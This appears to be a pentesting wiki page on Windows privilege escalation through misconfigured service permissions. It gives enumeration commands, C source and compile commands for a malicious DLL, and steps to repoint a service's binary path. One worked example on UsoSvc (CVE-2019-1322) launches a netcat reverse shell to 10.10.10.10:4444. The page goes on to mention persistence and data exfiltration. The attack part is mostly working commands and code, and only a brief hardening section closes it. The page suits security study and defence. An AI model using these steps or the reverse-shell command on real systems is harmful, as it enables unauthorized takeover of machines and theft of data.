EoP - Incorrect permissions in services

Key Concepts

1. Service Permissions

  • Writable services: Only trusted users should have write permissions.

  • Service path vulnerabilities: Writable paths may allow DLL hijacking or binary replacement.

2. Common Vulnerabilities

  • Orphaned installs: Services with missing or unmaintained binaries.

  • DLL hijacking: Services load malicious DLLs from writable locations.

  • Weak PATH permissions: Writable PATH directories allow privilege escalation.

Step-by-Step Guide to Identifying and Exploiting Vulnerable Services

1. Checking File Permissions

Use the icacls command to inspect service binary permissions:

icacls "C:\path\to\service\binary.exe"

Look for vulnerable permissions like:

  • BUILTIN\Users:(F) - Full access

  • BUILTIN\Users:(M) - Modify access

  • BUILTIN\Users:(W) - Write access

Example:

icacls "C:\Windows\System32\example_service.exe"

Output:

example_service.exe BUILTIN\Administrators:(I)(F)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(M)

2. Finding Vulnerable Services

List services with their executable paths:

wmic service list full | findstr /i "path"

Inspect individual service configurations:

for /f "tokens=2" %a in ('wmic service get name^, displayname^, pathname') do @sc qc %a | findstr "BINARY_PATH_NAME"

3. Identifying Potential DLL Hijacking

Using PowerUp to find DLL hijacking paths:

Import-Module PowerUp.ps1
Find-PathDLLHijack

Using Process Monitor (ProcMon):

  • Filter for NAME NOT FOUND entries during service startup to identify missing DLLs.

4. Compiling a Malicious DLL

Create a DLL to execute commands upon injection. Use the following sample code:

C Code for Malicious DLL:

#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Compile the DLL:

  • For x64:

    x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

  • For x86:

    i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

5. Exploiting the Vulnerability

  1. Stop the Service:

    sc stop <ServiceName>

  2. Modify the Service Binary Path:

    sc config <ServiceName> binPath= "C:\path\to\your\malicious.dll"

  3. Start the Service:

    sc start <ServiceName>

Example: Exploiting UsoSvc (CVE-2019-1322)

  1. Stop the Service:

    sc stop UsoSvc

  2. Modify Binary Path to Execute Payload:

    sc config UsoSvc binPath= "C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"

  3. Start the Service:

    sc start UsoSvc

6. Post-Exploitation

After gaining elevated privileges:

  • Maintain access: Establish persistence (e.g., backdoor or scheduled tasks).

  • Further exploitation: Explore lateral movement or sensitive data exfiltration.

Tools for Service Permission Analysis

Accesschk (Sysinternals)

Analyze permissions on a specific service:

accesschk.exe -uwcqv <ServiceName>

Metasploit Module

Automate the process using Metasploit:

exploit/windows/local/service_permissions

Security Considerations

  • Monitor permissions on critical services and binaries.

  • Restrict write access to trusted users.

  • Regularly audit PATH directories for inappropriate permissions.

PreviousEoP - Looting for passwordsNextEoP - Windows Subsystem for Linux (WSL)

Last updated